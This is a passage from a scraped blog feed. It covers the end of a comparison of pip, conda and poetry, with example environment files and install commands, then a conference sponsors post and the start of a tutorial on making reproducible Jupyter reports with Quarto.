&lt;p&gt;In pip a &lt;code&gt;requirements.txt&lt;/code&gt; file is used to store package versions (in practice the file could be given any name, but it is standard practice to name the file &lt;code&gt;requirements&lt;/code&gt;), however in conda a YAML file is used which is typically named &lt;code&gt;environment.yml&lt;/code&gt;. YAML (which stands for YAML Ain&amp;rsquo;t Markup Language) files are often used for configuration files and are human-readable. Within conda, YAML files are used to store any necessary information of your conda environment, this includes the packages for the project you are working on and the version of python being used (this could in practice be another coding language). To create an &lt;code&gt;environment.yml&lt;/code&gt; file in conda you can use the following command below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda env export &amp;gt; environment.yml
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will produce an &lt;code&gt;environment.yml&lt;/code&gt; file which will be similar to the example below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;name&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;lt;environment_name&amp;gt;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;channels&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;-&lt;span style="color:#a5d6ff"&gt;defaults&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;dependencies&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#a5d6ff"&gt;flake8=4.0.1&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#a5d6ff"&gt;numpy&amp;gt;=1.15.2&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#a5d6ff"&gt;pandas=2.1.0&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#a5d6ff"&gt;python=3.10.8&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#a5d6ff"&gt;scikit-learn=1.3.0&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;conda env export&lt;/code&gt; is similar to &lt;code&gt;pip freeze&lt;/code&gt; and will export all the relevant packages from your environment with the relevant versions, however instead of this being a list, it is in a format suitable for a YAML file. Also like pip, we use the &lt;code&gt;&amp;gt;&lt;/code&gt; operator to write the information from &lt;code&gt;conda env export&lt;/code&gt; into &lt;code&gt;environment.yml&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;To install all the packages and their dependencies with the specific versions from an &lt;code&gt;environment.yml&lt;/code&gt; file use the following command.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda env create -f environment.yml
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will create a new conda environment with all the packages and versions specified in &lt;code&gt;environment.yml&lt;/code&gt;. If you want to know more about python environments we will talk more about these along with their uses in an upcoming blog.&lt;/p&gt;
&lt;h4 id="poetry-1"&gt;poetry&lt;/h4&gt;
&lt;p&gt;By default, when you create a new poetry project (using &lt;code&gt;poetry new &amp;lt;PROJECT-NAME&amp;gt;&lt;/code&gt;)
a &lt;code&gt;pyproject.toml&lt;/code&gt; file will be generated. Once you have added packages to your
poetry project, your &lt;code&gt;pyproject.toml&lt;/code&gt; file will look like something similar to
below:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-csharp" data-lang="csharp"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[tool.poetry]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;name = &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;lt;environment_name&amp;gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;version = &lt;span style="color:#a5d6ff"&gt;&amp;#34;0.1.0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;description = &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;authors = &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jane Doe {jane.doe@123evergreenterrace.com}&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[tool.poetry.dependencies]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python = &lt;span style="color:#a5d6ff"&gt;&amp;#34;^3.10&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;numpy = &lt;span style="color:#a5d6ff"&gt;&amp;#34;^1.25.2&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pandas = &lt;span style="color:#a5d6ff"&gt;&amp;#34;^2.1.0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[build-system]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;requires = [&lt;span style="color:#a5d6ff"&gt;&amp;#34;poetry-core&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;build-backend = &lt;span style="color:#a5d6ff"&gt;&amp;#34;poetry.core.masonry.api&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The python packages you install can be seen under &lt;code&gt;[tool.poetry.dependencies]&lt;/code&gt; along with the Python version. You can add extra requirements to the &lt;code&gt;pyproject.toml&lt;/code&gt; file by either manually editing it, or by using &lt;code&gt;poetry add &amp;lt;package&amp;gt;&lt;/code&gt;. If you want to manually edit the TOML file, the hat notation &lt;code&gt;^&lt;/code&gt; is equivalent to greater than or equal to, e.g. if you require Python 3.10 or above you can add &lt;code&gt;python = &amp;quot;^3.10&amp;quot;&lt;/code&gt; to the TOML file.&lt;/p&gt;
&lt;p&gt;When you install dependencies in a poetry project, the exact version numbers of
the installed packages and &lt;em&gt;their&lt;/em&gt; dependencies are added to a &amp;ldquo;poetry.lock&amp;rdquo;
file located in the same directory. The pyproject.toml and poetry.lock files
can then be shared with a colleague, who can install the dependencies by
running the following command in the same directory as the files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry install
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To use the dependencies installed by poetry, you need to activate the poetry
&lt;em&gt;environment&lt;/em&gt; by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry shell
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You will now be using the same development environment as any colleagues that
are working on the same project. We will learn more about poetry and other
virtual environments in an upcoming blog.&lt;/p&gt;
&lt;p&gt;If instead you have a &lt;code&gt;requirements.txt&lt;/code&gt; file, we can still install the packages and relevant versions using poetry. This can be done as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry add &lt;span style="color:#ff7b72"&gt;$(&lt;/span&gt; cat requirements.txt &lt;span style="color:#ff7b72"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will add each package and version to the &lt;code&gt;pyproject.toml&lt;/code&gt; file. We can use &lt;code&gt;$( cat requirements.txt )&lt;/code&gt; to feed each line of &lt;code&gt;requirements.txt&lt;/code&gt; to &lt;code&gt;poetry add&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="conclusion"&gt;Conclusion&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Package manager&lt;/th&gt;
&lt;th style="text-align: center"&gt;Easy to install&lt;/th&gt;
&lt;th style="text-align: center"&gt;Online support&lt;/th&gt;
&lt;th style="text-align: center"&gt;Latest packages always available&lt;/th&gt;
&lt;th style="text-align: center"&gt;Virtual environment manager&lt;/th&gt;
&lt;th style="text-align: center"&gt;Handles package dependencies&lt;/th&gt;
&lt;th style="text-align: center"&gt;Small installation size&lt;/th&gt;
&lt;th style="text-align: center"&gt;Multi-platform&lt;/th&gt;
&lt;th style="text-align: center"&gt;Access to PyPI&lt;/th&gt;
&lt;th style="text-align: center"&gt;Easy Python package publishing&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;pip&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;conda&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅*&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;poetry&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;div style="text-align: right"&gt; *by using pip &lt;/div&gt;
&lt;p&gt;Installing Python package managers is a straightforward process that varies slightly based on your operating system. Regardless of whether you&amp;rsquo;re using Windows, macOS, or Linux, setting up these tools is a small investment that pays off in significantly improved project management and development practices. A table summarising some pros and cons of each package manager we have covered is shown in the table above. I would not recommend installing all three package managers at once as it may become confusing to remember what you have installed in which package manager. I would recommend choosing whichever you like the look of best and try that one first. Personally I would recommend either installing pip or conda if this is your first introduction to Python and poetry if you are working on a collaborative project. However, choose the package manager that best suits your needs and enjoy the benefits of efficient dependency management and streamlined development workflows.&lt;/p&gt;
&lt;script&gt;
// Get the element with id="defaultOpen" and click on it
function openOS(evt, OSName) {
var i, tabcontent, tablinks;
tabcontent = document.getElementsByClassName("tabcontent");
for (i = 0; i &lt; tabcontent.length; i++) {
tabcontent[i].style.display = "none";
}
tablinks = document.getElementsByClassName("tablinks");
for (i = 0; i &lt; tablinks.length; i++) {
tablinks[i].className = tablinks[i].className.replace(" active", "");
}
document.getElementById(OSName).style.display = "block";
evt.currentTarget.className += " active";
}
&lt;/script&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production: Sponsors</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2023-sponsors/</link><pubDate>Thu, 28 Sep 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2023-sponsors/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2023-sponsors/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2023-sponsors/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;There&amp;rsquo;s only two weeks left to go until Shiny in Production 2023! The events team are hard at work getting things ready for the day, and we wanted to take this opportunity to say a huge thank you to our event sponsors!&lt;/p&gt;
&lt;h3 id="gold-sponsor"&gt;Gold Sponsor&lt;/h3&gt;
&lt;h4 id="national-innovation-centre-for-data"&gt;National Innovation Centre for Data&lt;/h4&gt;
&lt;p&gt;The &lt;a href="https://www.nicd.org.uk/" rel="external"&gt;National Innovation Centre for Data&lt;/a&gt; (NICD) was created in 2019 with £30 million of funding from the government and Newcastle University. Based in the state-of-the-art Helix science district in Newcastle, our mission is to transfer data skills to the UK workforce. Our team of PhD-level data scientists work to ensure that organisations across the country are equipped to reap the benefits of the global data-driven revolution.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.nicd.org.uk/"&gt;&lt;img src="nicd_logo.png" alt="NICD logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-shiny-in-production-sponsors"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="silver-sponsors--drinks-reception"&gt;Silver Sponsors + Drinks Reception&lt;/h3&gt;
&lt;h4 id="royal-statistical-society"&gt;Royal Statistical Society&lt;/h4&gt;
&lt;p&gt;Founded in 1834, the &lt;a href="https://rss.org.uk/" rel="external"&gt;Royal Statistical Society&lt;/a&gt; (RSS) are one of the world&amp;rsquo;s leading organisations advocating for the importance of statistics and data. They&amp;rsquo;re a professional body for all statisticians and data analysts &amp;ndash; wherever they may live.&lt;/p&gt;
&lt;p&gt;They have more than 10,000 members in the UK and across the world. As a charity, they advocate for the key role of statistics and data in society, and work to ensure that policy formulation and decision making are informed by evidence for the public good.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://rss.org.uk/"&gt;&lt;img src="rss_logo.png" alt="RSS logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="silver-sponsors"&gt;Silver Sponsors&lt;/h3&gt;
&lt;h4 id="newcastle-university-solve"&gt;Newcastle University Solve&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;Newcastle University Solve&lt;/a&gt; (NU Solve) has been helping businesses, public sector organisations and industries to find answers to complex challenges for more than three decades. We emerged out of the Industrial Statistics Research Unit, which had successfully engaged with enterprises since 1984.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/"&gt;&lt;img src="nu-solve_logo.png" alt="NU Solve logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4 id="posit"&gt;Posit&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&amp;rsquo;s mission is to create open-source software for data science,
scientific research, and technical communication. They do this to
enhance the production and consumption of knowledge by everyone,
regardless of economic means.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://posit.co/"&gt;&lt;img src="posit_logo.png" alt="Posit logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4 id="r-consortium"&gt;R Consortium&lt;/h4&gt;
&lt;p&gt;The central mission of the &lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt; is to work with and provide support to the R Foundation and to the key organizations developing, maintaining, distributing and using R software through the identification, development and implementation of infrastructure projects.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.r-consortium.org/"&gt;&lt;img src="rconsortium_logo.png" alt="R Consortium logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2023-sponsors/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Reproducible reports with Jupyter</title><link>https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/</link><pubDate>Thu, 21 Sep 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/featured-high-res.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Jupyter notebooks are a useful tool for Python users of all levels. They allow
us to mix together plain text (formatted as Markdown) with Python code. This
is beneficial for beginners and experienced data scientists alike:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Beginners that are learning Python for the first time can use Markdown cells
to annotate code and record notes.&lt;/li&gt;
&lt;li&gt;By splitting up their code into chunks, developers can write and test their
code in a modular manner.&lt;/li&gt;
&lt;li&gt;Jupyter notebooks are open-source and a convenient format for developers to
share reports containing live code, equations, visualisations and narrative
text with colleagues.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this post, we will go deeper with these ideas and show you how to create
reproducible HTML and PDF reports with Jupyter. This blog is a follow-up to
&lt;a href="https://www.jumpingrivers.com/blog/quarto-for-python-users/" rel="external"&gt;Quarto for the Python user&lt;/a&gt;,
which explained how to generate reproducible reports from plain text files with
Quarto.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-quarto-for-jupyter"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="what-is-quarto"&gt;What is Quarto?&lt;/h3&gt;
&lt;p&gt;Quarto is a free-to-use, open-source software based on Pandoc that enables
users to convert plain text files into a range of formats, including PDF, HTML
and powerpoint presentations. These documents can contain a mixture of
narrative text, Python code, and figures that are dynamically generated by the
embedded code.&lt;/p&gt;
&lt;p&gt;This has many use-cases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Your company may have a weekly board meeting to go over the latest sales
figures. By having a Quarto presentation that pulls in the latest company
sales data, you can regenerate the presentation slides each week at the click
of a button.&lt;/li&gt;
&lt;li&gt;As a researcher you may be preparing a report for publication. By having the
code that generates data tables and figures embedded within the report,
regenerating the draft as the experimental data floods in is a breeze!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In our recent blog post,
&lt;a href="https://www.jumpingrivers.com/blog/quarto-for-python-users/" rel="external"&gt;Quarto for the Python user&lt;/a&gt;,
we used Quarto to render dynamic reports that mix together Python code and
narrative text. We used Quarto&amp;rsquo;s standard workflow, which starts from plain
text &lt;code&gt;.qmd&lt;/code&gt; files. In this post we will extend these ideas to Jupyter
Notebooks.&lt;/p&gt;
&lt;p&gt;Starting with &lt;code&gt;.ipynb&lt;/code&gt; notebook files, the Quarto workflow is:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A flow chart of the Quarto rendering workflow: The ipynb file is first converted to Markdown, with Jupyter used to interpret the code cells. The Markdown file can then be converted to a variety of formats, including HTML, DOCX and PDF, using Pandoc." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/quarto-diagram.png" width="960"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A Jupyter kernel is used to interpret the Python code cells and Quarto
generates a Markdown document.&lt;/li&gt;
&lt;li&gt;The Markdown document includes the text, code, and any figures or results
that were generated by the code.&lt;/li&gt;
&lt;li&gt;This is then converted into the desired output format (PDF, HTML, etc) using
Pandoc.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="prerequisites"&gt;Prerequisites&lt;/h3&gt;
&lt;p&gt;We will be using &lt;a href="https://code.visualstudio.com/download" rel="external"&gt;VS Code&lt;/a&gt; to edit and
render our Jupyter notebook (the only other IDE with support for both Jupyter
and Quarto is
&lt;a href="https://jupyterlab.readthedocs.io/en/latest/getting_started/overview.html" rel="external"&gt;JupyterLab&lt;/a&gt;).
Before you can work with Jupyter in VS Code, you will need to install the
Jupyter extension. This can be located in VS Code by clicking &amp;ldquo;Settings&amp;rdquo; -&amp;gt;
&amp;ldquo;Extensions&amp;rdquo; then typing &amp;ldquo;jupyter&amp;rdquo; into the extensions search bar. Select the
&amp;ldquo;Jupyter&amp;rdquo; extension by Microsoft and click &amp;ldquo;Install&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;You will also need to &lt;a href="https://quarto.org/docs/get-started/" rel="external"&gt;install Quarto&lt;/a&gt;.
You can then find the Quarto extension in VS Code by typing &amp;ldquo;quarto&amp;rdquo; into the
extensions search bar. Select the &amp;ldquo;Quarto&amp;rdquo; extension and click &amp;ldquo;Install&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;Finally, to reproduce the examples covered in this post, you will need to
install the Python dependencies by running the following command from your
terminal:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;python3 -m pip install ipykernel nbclient nbformat pandas papermill plotly statsmodels
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;These dependencies are required for creating an interactive Plotly figure in
Jupyter and rendering the notebook from the command line.&lt;/p&gt;
&lt;h4 id="setting-up-a-virtual-environment"&gt;Setting up a virtual environment&lt;/h4&gt;
&lt;p&gt;In case you&amp;rsquo;d like to follow along with these examples using a virtual
environment, we will provide brief instructions for setting up a kernel on
Jupyter. If you&amp;rsquo;re happy to just use your system Python installation then you
can move onto the next section.&lt;/p&gt;
&lt;p&gt;To create a virtual environment, run the following command from your command
terminal:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;python3 -m venv venv
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This will create a folder called &amp;ldquo;venv&amp;rdquo; which can be used to activate the
virtual environment (you can call it whatever you like). To activate it, run:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;source venv/bin/activate
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Now install the Python dependencies into your environment by running the &lt;code&gt;pip&lt;/code&gt;
command shared above. You can now add this environment to your list of Jupyter
kernels by running:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;ipython kernel install --user --name=venv
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This will add a kernel called &amp;ldquo;venv&amp;rdquo;. Next time you open a Jupyter notebook,
you should now be able to select this kernel from the list of options.&lt;/p&gt;
&lt;h3 id="rendering-a-report"&gt;Rendering a report&lt;/h3&gt;
&lt;p&gt;We will generate a report about Mario Kart 64 world records. Please refer to
our &lt;a href="https://www.jumpingrivers.com/blog/quarto-for-python-users/" rel="external"&gt;previous post&lt;/a&gt;
for a recap of the YAML header, Markdown syntax and code chunk options (we will
only briefly cover these topics here).&lt;/p&gt;
&lt;h4 id="setting-up-jupyter"&gt;Setting up Jupyter&lt;/h4&gt;
&lt;p&gt;Within VS Code, create a Jupyter notebook by clicking &amp;ldquo;File&amp;rdquo; -&amp;gt; &amp;ldquo;New File&amp;hellip;&amp;rdquo;
-&amp;gt; &amp;ldquo;Jupyter Notebook (.ipynb support)&amp;rdquo;. Within the notebook, you can select the
kernel by clicking &amp;ldquo;Select Kernel&amp;rdquo; and choosing an option from the available
list (for example, your system Python installation or a virtual environment).
For this post, we used Python 3.10.&lt;/p&gt;
&lt;h4 id="header-settings"&gt;Header settings&lt;/h4&gt;
&lt;p&gt;The first code cell should be changed to a Raw NB Convert cell. In VS Code, the
cell type can be changed by clicking the text in the bottom-right corner of the
cell (this will read &amp;ldquo;Python&amp;rdquo; for a Python code cell). To select a raw cell,
type &amp;ldquo;raw&amp;rdquo; in the search bar and click the option that appears.&lt;/p&gt;
&lt;p&gt;The raw NB convert cell acts as the YAML header of the Quarto report. This is
where we include settings such as the title and default output format. Our
example is given below:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;---
title: &amp;#34;Reporting on Mario Kart 64 World Records&amp;#34;
author: &amp;#34;Parisa Gregg &amp;amp; Myles Mitchell&amp;#34;
date: &amp;#34;1 Aug 2023&amp;#34;
format: html
execute:
eval: true
jupyter: python3
---
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This sets the default output format to HTML and ensures that the code cells are
evaluated on execution. Remember to include the fencing (&lt;code&gt;---&lt;/code&gt;) for YAML
code.&lt;/p&gt;
&lt;h4 id="adding-text-and-code"&gt;Adding text and code&lt;/h4&gt;
&lt;p&gt;The remainder of the report will be built from a mixture of Markdown and Python
code cells:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Markdown cells are used for narrative text in the report.&lt;/li&gt;
&lt;li&gt;Python cells are used for displaying Python code and generating dynamic
content (e.g., figures, tables and inline results).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Try copying the following into a Markdown code cell. This adds the Abstract,
Introduction and the beginning of the Methods section:&lt;/p&gt;
